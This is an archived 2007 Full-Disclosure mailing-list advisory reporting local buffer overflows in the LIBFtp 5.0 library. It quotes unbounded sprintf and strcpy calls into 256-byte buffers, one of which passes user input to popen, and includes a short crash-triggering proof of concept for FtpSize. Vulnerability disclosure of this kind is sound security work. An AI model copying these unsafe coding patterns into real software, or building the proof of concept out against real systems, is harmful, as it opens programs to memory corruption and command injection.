lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 15 Mar 2007 20:41:31 +0100
From: "starcadi starcadi" <starcadi@...il.com>
To: listgrok <full-disclosure@...ts.grok.org.uk>
Subject: LIBFtp 5.0 (sprintf(),
	strcpy()) Multiple local buffer overflow

http://www.netsw.org/net/ip/filetrans/ftp/libftp/

>> Description

the library has a multiple (sprintf(), strcpy()) buffer overflow in
various functions.

>> Source errors

fvuln = FtpArchie() FtpDebugDebug() FtpOpenDir() FtpSize()

the FtpString is a typedef of an array with 256bytes:
FtpLibrary.h: typedef char FtpString[256];

..
STATUS FtpChmod(FTP *ftp,char *file,int mode)
{
  FtpString msg;

  sprintf(msg,"SITE CHMOD %03o %s",mode,file);
  return FtpCommand(ftp,msg,"",200,EOF);

}

..

int FtpArchie ( char *what, ARCHIE *result, int len)
{
  FILE *archie;
  FtpString cmd,tmp;
  int i;

  bzero(result,sizeof(result[0])*len);

  sprintf(cmd,"archie -t -l -m %d %s",len,what);

  if ((archie = popen(cmd,"r"))==NULL)
    return 0;

..

STATUS FtpDebugDebug(FTP *ftp,int n, char * Message)
{
  FtpString tmp;


  strcpy(tmp,Message);

  if (strncmp(tmp,"PASS ",5)==0)
    {
      char *p=tmp+5;
      while ( *p != '\0') *p++='*';
    };

..

STATUS FtpOpenDir(FTP * con,char * file)
{
  FtpString command;

  if ( file == NULL || *file == '\0' )
    strcpy(command,"NLST");
  else
    sprintf(command,"NLST %s",file);

  return FtpCommand(con,command,"",120,150,200,EOF);
}

..

int FtpSize(FTP * con, char *filename)
{
  FtpString tmp;
  int i,size;

  strcpy(tmp,"SIZE ");
  strcat(tmp,filename);

  if ( FtpSendMessage(con,tmp) == QUIT )
    return EXIT(con,QUIT);
..

>> POC

#include <FtpLibrary.h>

#define OVF_BUF (270)

int main()
{
	char *buf;

	buf = (char *) malloc(OVF_BUF+1);
	memset(buf, 'A', OVF_BUF);

	// insert function to init ftp connection..
	// insert function to manage ftp connection..

	// calling vulnerable function example FtpSize()
	FtpSize(NULL, buf);

	// insert function to close ftp connection..

	return(0);
}

-- 
~ starcadi

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists